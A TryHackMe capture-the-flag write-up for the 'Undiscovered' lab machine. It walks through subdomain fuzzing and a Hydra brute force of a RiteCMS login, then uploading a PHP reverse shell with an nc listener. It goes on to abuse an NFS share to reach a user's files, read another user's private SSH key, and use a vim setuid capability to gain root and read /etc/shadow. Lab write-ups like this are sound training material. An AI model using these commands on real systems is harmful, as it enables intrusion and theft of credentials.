Hello. I’m Rahmos. Here is my Undiscovered — TryHackMe — WriteUp. Check it out!
First, add undiscovered.thm to your /etc/hosts. Then, deploy the machine and nmap for opened ports:
nmap -A -T4 -p- -v <ip>
So there are 5 ports opened: 22(SSH), 80(HTTP), 111(RPC), 2049(NFS), and 41693(nlockmgr).
Let’s first access the website at port 80:
I’ve checked the page source but nothing valuable. So let’s move to finding hidden dirs using gobuster:
gobuster dir -u http://undiscovered.thm -w /path-to-wordlist
However, I’ve found nothing.
I’ve also tried to list mountable folder using showmount, but still not worked.
So next, I will find the web’s subdomains using wfuzz:
wfuzz -c -f undiscovered.txt -w /path-to-wordlist -u “http://undiscovered.thm/” -H “Host:FUZZ.undiscovered.thm” — hw 290 — hc 404,302
I will use the “SecLists” wordlist, you can find it here.
After wfuzz finished, cat undiscovered.txt to see the result:
Well I’ve found many subdomains here! Let’s add one of them to /etc/hosts and access it. I will choose “manager”.
So it’s using RiteCMS version 2.2.1. Look for exploit and I found this link.
So what I need to find now is the /cms page to login. However, subdomain “manager” doesn’t have this /cms page. So I wrote a simple script by Python to visit /cms at all the subdomains I found above, and “deliver” is the right one.
According to the link, the default username : password is admin : admin. So let’s try to login.
However, I can’t use this default credential login. So I’ll bruteforce the password using Hydra:
hydra -l admin -P rockyou.txt deliver.undiscovered.thm http-post-form “/cms/index.php:username=^USER^&userpw=^PASS^:User unknown or password wrong”
After a while, I’ve got the password.
Navigate to File Manager →Upload. Upload the php-reverse-shell.
Now the shell has been uploaded. Start a listener:
nc -lvnp 4444
Access “deliver.undiscovered.thm/media/php-reverse-shell.php” to activate it.
I’ve got the shell into the machine. Spawn a tty shell using Python:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
There are 2 users in /home, however, I cannot access inside both folders now due to permission.
So I’ll find another way to get their credentials. Because there’s a website, so let’s access /var/www to see if there is any configuration files.
All subdomains of the website are there. Because I’ve known “deliver” is the right subdomain, so let’s access its folder.
There’re 2 hidden folders: data and files. There’s nothing inside files:
So let’s enum more inside data. However, there’s only the admin’s password is in there, which I’ve known before.
Let’s find another way. Look back at nmap, there’re NFS share folders, but I cannot access. But now I’ve got the shell into the machine, so I can see which folders are shared by cat /etc/exports:
So folder /home/william is shared and can be accessed. Let’s see his uid and gid:
It’s 3003. Create a user “william” on your machine with the same uid and gid, and mount the folder to see what’s inside.
useradd -u 3003 william
Ok so “william” has been created. Mount his homefolder:
mount -t nfs <ip>:/home/william /home/william
Change william’s shell to /bin/bash:
usermod — shell /bin/bash william
Then su william and access /home/willam:
Get the 1st flag:
Now I’ll find a way to own root and get the final flag. First, change the permission of /home/william to 777, so I can access it from the target machine as www-data.
chmod 777 /home/william
There’re 2 suspicious files inside william’s home folder: admin.sh and script.
Use ghidra to decompile script:
Ok so if I execute script without argument, it will exec admin.sh. But if I provide with argument, I can read this argument(strcat) as leonard priv.
Go back to the reverse shell at target machine. Let’s try exec script:
Let’s see if leonard has the private ssh key:
Ah yes! Now I’ve got the private SSH key of leonard! Create a txt file with the content of this private key, chmod 600 this file and ssh to the machine as leonard!
And because leonard’s private key has no password, I’m in!
Let’s check Capabilities:
getcap -r / 2>/dev/null
Well so vim.basic has the cap of setuid. Reference to gtfobins, exec this command to get root shell:
/usr/bin/vim.basic -c ‘:py import os; os.setuid(0); os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’
Oh wait, it’s not working! Let’s try again with py3(python3):
/usr/bin/vim.basic -c ‘:py3 import os; os.setuid(0); os.execl(“/bin/sh”, “sh”, “-c”, “reset; exec sh”)’
Now I’m root! Get root’s password’s hash in /etc/shadow, it will be the final flag.